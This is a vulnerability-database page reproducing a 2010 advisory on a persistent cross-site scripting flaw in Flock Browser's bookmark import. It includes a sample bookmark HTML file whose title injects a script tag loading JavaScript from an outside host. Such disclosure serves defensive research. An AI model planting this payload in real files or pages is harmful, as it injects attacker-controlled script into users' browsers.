Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Flock Browser 3.0.0.3989 Malformed Bookmark Cross Site Scripting

🗓️ 21 Aug 2010 00:00:00Reported by LostmonType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 22 Views

Flock Browser 3.0.0.3989 Malformed Bookmark Cross Site Scripting vulnerability in persistent script insertio

Code
`#########################################  
Flock Browser 3.0.0.3989 Malformed Bookmark XSS  
Vendor URL: http://beta.flock.com/  
Advisore: http://lostmon.blogspot.com/2010/08/flock-browser-3003989-malformed.html  
Vendor notify:NO exploits availables:YES  
#########################################  
  
Flock is faster, simpler, and more friendly. Literally.  
It's the only sleek, modern web browser with the built-in  
ability to keep you up-to-date with your Facebook and Twitter  
friends.This browser version (3.0.0.3989) is based in a old  
chromium project  
  
  
Flock has a flaw that allows Cross-site scripting style attacks  
In bookmarks is has a Malformed bookmark title persistent xss  
when inport from other browsers a malformed bookmark or when add  
a new malformed bookmark or import a bookmark html file.  
  
###############################  
Example Of Bookmark html file  
###############################  
  
<!DOCTYPE NETSCAPE-Bookmark-file-1>  
<!-- This is an automatically generated file.  
It will be read and overwritten.  
DO NOT EDIT! -->  
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8">  
<TITLE>Bookmarks</TITLE>  
<H1>Menú Marcadores</H1>  
<DL><p>  
<DT><A HREF="http://www.mozilla.org" ADD_DATE="1282083605"  
LAST_MODIFIED="1282083638">"><script  
src='http://vuln.xssed.net/thirdparty/scripts/ckers.org.js'></A>  
</DL><p>  
  
#####################EOF##################  
  
It is a persintent script insercion and when the user click in the  
menu for view  
favorites page or access directly to favorites url this make a  
"defacement" of this page and them the user can´t access to favorites  
:)  
( Url of favorites =>  
chrome-extension://flock_people/favorites.html#p=1&v=all&o=0&s=title )  
  
################# €nd #######################  
  
Atentamente:  
Lostmon ([email protected])  
Web-Blog: http://lostmon.blogspot.com/  
Google group: http://groups.google.com/group/lostmon (new)  
--  
La curiosidad es lo que hace mover la mente....  
  
  
  
--   
atentamente:  
Lostmon ([email protected])  
Web-Blog: http://lostmon.blogspot.com/  
Google group: http://groups.google.com/group/lostmon (new)  
--  
La curiosidad es lo que hace mover la mente....  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
21 Aug 2010 00:00Current
7.4High risk
Vulners AI Score7.4
flock browsercross-site scriptingmalformed bookmarkpersistentscript insertion
22